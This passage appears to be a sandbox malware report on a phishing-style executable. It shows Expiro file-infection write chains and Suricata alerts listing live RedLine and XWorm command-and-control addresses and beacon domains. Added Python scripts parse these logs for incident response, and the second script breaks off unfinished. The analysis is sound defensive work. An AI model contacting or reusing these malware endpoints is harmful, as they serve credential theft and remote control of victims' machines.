Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\notification_click_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\Uninstall.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe System file written: C:\Windows\System32\msdtc.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedge_pwa_launcher.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\Installer\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe System file written: C:\Windows\System32\alg.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\cookie_exporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zFM.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\Installer\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\BHO\ie_to_edge_stub.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\pwahelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\elevation_service.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\cookie_exporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\notification_helper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\pwahelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\identity_helper.exe Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0046445A
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046C6D1 FindFirstFileW,FindClose, 0_2_0046C6D1
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0046C75C
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0046EF95
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0046F0F2
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0046F3F3
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_004637EF
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00463B12
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0046BCBC
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 6_2_06B886C8
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 4x nop then jmp 06B8C5F0h 6_2_06B8C0F8
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 4x nop then jmp 06B8A0BBh 6_2_06B89DF8
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 4x nop then jmp 06B88022h 6_2_06B87D60
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 4x nop then jmp 06B89195h 6_2_06B88DB8
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 4x nop then jmp 07233A83h 6_2_07233850
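Read together, the "System file written" observations above describe a file-infection chain rather than a simple dropper: the sample overwrites service binaries (AppVClient.exe and alg.exe in System32, Adobe's armsvc.exe), the infected alg.exe then rewrites practically every third-party executable under Program Files, and one of those (Edge's elevation_service.exe) goes on to overwrite FXSSVC.exe and msdtc.exe. That is the pattern of the Expiro family to which the Suricata rules in the Networking section attribute the HTTP beacons. The script below is an added example and not part of the Joe Sandbox report: it parses these observation lines (with or without the report's "Jump to behavior" link text), flags any writer that overwrites many PE files, walks the write graph from the sample to recover the chain, and lists the Windows system binaries that were touched. The sample lines embedded as input are a subset copied from the report; the threshold of five PE targets is my choice.

```python
import re
from collections import defaultdict

# "System file written" lines copied from this report (a subset of the roughly
# 110 such observations). The parser accepts them with or without the
# "Jump to behavior" link text the report appends to most of them.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe System file written: C:\Windows\System32\AppVClient.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe System file written: C:\Windows\System32\alg.exe Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe System file written: C:\Windows\System32\msdtc.exe
"""

ROOT = r"C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe"
SYSTEM32 = "c:\\windows\\system32\\"
PE_EXT = (".exe", ".dll", ".sys")

WRITE_RE = re.compile(
    r"^Source: (?P<writer>.+?) System file written: (?P<target>.+?)"
    r"(?: Jump to behavior)?$"
)


def parse_writes(text):
    """Return (writer, target) pairs from 'System file written' lines."""
    pairs = []
    for line in text.splitlines():
        m = WRITE_RE.match(line.strip())
        if m:
            pairs.append((m.group("writer"), m.group("target")))
    return pairs


def build_graph(pairs):
    """writer path -> set of paths it wrote."""
    graph = defaultdict(set)
    for writer, target in pairs:
        graph[writer].add(target)
    return graph


def find_infectors(graph, threshold=5):
    """Writers that overwrote at least `threshold` distinct PE files. A genuine
    updater touches its own product; nothing legitimate rewrites Firefox, 7-Zip,
    Java and Acrobat in one run. The threshold is an assumption for this example."""
    return {
        w for w, targets in graph.items()
        if sum(1 for t in targets if t.lower().endswith(PE_EXT)) >= threshold
    }


def infection_chains(graph, root):
    """Every write chain starting at `root`: each hop is a binary that was itself
    overwritten and then went on to overwrite others (depth-first, cycle-safe)."""
    chains = []

    def walk(node, path, seen):
        extended = False
        for nxt in sorted(graph.get(node, ())):
            if nxt in seen:
                continue
            extended = True
            walk(nxt, path + [nxt], seen | {nxt})
        if not extended and len(path) > 1:
            chains.append(path)

    walk(root, [root], {root})
    return chains


def system_binaries_written(pairs):
    """Windows system binaries that were overwritten: restore these from
    known-good media rather than trusting an AV 'clean' of the infected file."""
    return sorted({t for _, t in pairs if t.lower().startswith(SYSTEM32)})


if __name__ == "__main__":
    pairs = parse_writes(SAMPLE_LINES)
    graph = build_graph(pairs)
    print("file-infector candidates:", find_infectors(graph))
    for chain in infection_chains(graph, ROOT):
        print(" -> ".join(p.rsplit("\\", 1)[-1] for p in chain))
    print("system binaries to restore:", system_binaries_written(pairs))
```

Run against the full report the chain walk is what scopes the clean-up: every binary that appears as a writer after being a target is a second-generation infector, so a host that ran this sample needs every listed executable reinstalled or restored, not just the original dropper removed.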

Networking

Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.6:51901 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.6:49695 -> 72.52.178.23:80
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.6:49692 -> 204.10.161.147:7082
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.6:49692 -> 204.10.161.147:7082
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 204.10.161.147:7082 -> 192.168.2.6:49692
Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.6:49714 -> 54.169.144.97:80
Source: Network traffic Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49713 -> 204.10.161.147:7081
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 204.10.161.147:7081 -> 192.168.2.6:49713
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49713 -> 204.10.161.147:7081
Source: Network traffic Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 204.10.161.147:7081 -> 192.168.2.6:49713
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 204.10.161.147:7082 -> 192.168.2.6:49692
Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.6:52381 -> 1.1.1.1:53
Source: Malware configuration extractor URLs: 204.10.161.147
Source: Malware configuration extractor URLs: 204.10.161.147:7082
Source: global traffic TCP traffic: 204.10.161.147 ports 7082,7081,0,2,7,8
Source: unknown DNS traffic detected: English language letter frequency does not match the domain names
Source: unknown Network traffic detected: DNS query count 43
Source: global traffic TCP traffic: 192.168.2.6:49692 -> 204.10.161.147:7082
Source: Joe Sandbox View IP Address: 13.248.148.254 13.248.148.254
Source: Joe Sandbox View IP Address: 165.160.15.20 165.160.15.20
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.169.144.97:80 -> 192.168.2.6:49714
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.169.144.97:80 -> 192.168.2.6:49714
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.213.51.196:80 -> 192.168.2.6:49690
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.213.51.196:80 -> 192.168.2.6:49690
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.229.117.57:80 -> 192.168.2.6:49694
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.229.166.50:80 -> 192.168.2.6:49721
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.229.117.57:80 -> 192.168.2.6:49694
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.43.119.120:80 -> 192.168.2.6:49726
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.229.166.50:80 -> 192.168.2.6:49721
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.43.119.120:80 -> 192.168.2.6:49726
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.11.240.239:80 -> 192.168.2.6:49729
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.11.240.239:80 -> 192.168.2.6:49729
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.142.91.111:80 -> 192.168.2.6:49723
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.142.91.111:80 -> 192.168.2.6:49723
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.26.80.133:80 -> 192.168.2.6:49731
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.26.80.133:80 -> 192.168.2.6:49731
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.85.87.184:80 -> 192.168.2.6:49727
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.85.87.184:80 -> 192.168.2.6:49727
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.245.175.187:80 -> 192.168.2.6:49720
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.245.175.187:80 -> 192.168.2.6:49720
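The Networking observations mix three things a responder has to keep apart: live C2 (RedLine on 204.10.161.147:7082 and XWorm on 204.10.161.147:7081 according to the Suricata rules above), Expiro beacon hosts several of which now answer from AnubisNetworks sinkholes (the Snkz/btst cookie alerts), and the beacon fingerprint itself in the HTTP requests that follow: one fixed User-Agent string, POST bodies of 778 bytes, random paths and a fresh .biz host on nearly every request. The script below is an added example and not part of the Joe Sandbox report. It parses the alert and request lines as the report prints them, separates live from sinkholed endpoints and pulls the defanged domain out of the DNS-query rule, clusters the POSTs by (User-Agent, Content-Length) to recover the beacon fingerprint, and implements the letter-frequency check the report mentions. The family keyword mapping, the 192.168. local-range assumption and the three-host cluster threshold are my choices; the embedded alert and request lines are copied from this report.

```python
import math
import re
from collections import defaultdict

LOCAL_PREFIX = "192.168."  # assumption: the sandbox host's private address range

# Suricata alert lines copied from this report.
ALERT_LINES = """\
Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.6:51901 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.6:49695 -> 72.52.178.23:80
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.6:49692 -> 204.10.161.147:7082
Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.6:49714 -> 54.169.144.97:80
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 204.10.161.147:7081 -> 192.168.2.6:49713
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.169.144.97:80 -> 192.168.2.6:49714
"""
ALERT_RE = re.compile(r"Suricata IDS: (?P<sid>\d+) - Severity \d+ - (?P<msg>.+?) : "
                      r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$")
# assumption: the family can be read from a keyword in the rule message
FAMILIES = (("sinkhole", "sinkhole"), ("redline", "RedLine"), ("xworm", "XWorm"), ("expiro", "Expiro"))


def triage_alerts(text):
    """Return (live C2 per family, sinkholed endpoints, beacon domains). A sinkhole
    reply means the domain was seized: block it, but do not report it as attacker infra."""
    live, sinkholed, domains = defaultdict(set), set(), set()
    for line in text.splitlines():
        m = ALERT_RE.search(line)
        if not m:
            continue
        msg, low = m["msg"], m["msg"].lower()
        # the remote side is whichever end is not the analysis host
        if m["src"].startswith(LOCAL_PREFIX):
            remote = f"{m['dst']}:{m['dport']}"
        else:
            remote = f"{m['src']}:{m['sport']}"
        dom = re.search(r"\(([^)]+)\)", msg)
        if "dns query" in low and dom:
            domains.add(dom[1].replace(" ", ""))  # the report defangs as "przvgke .biz"
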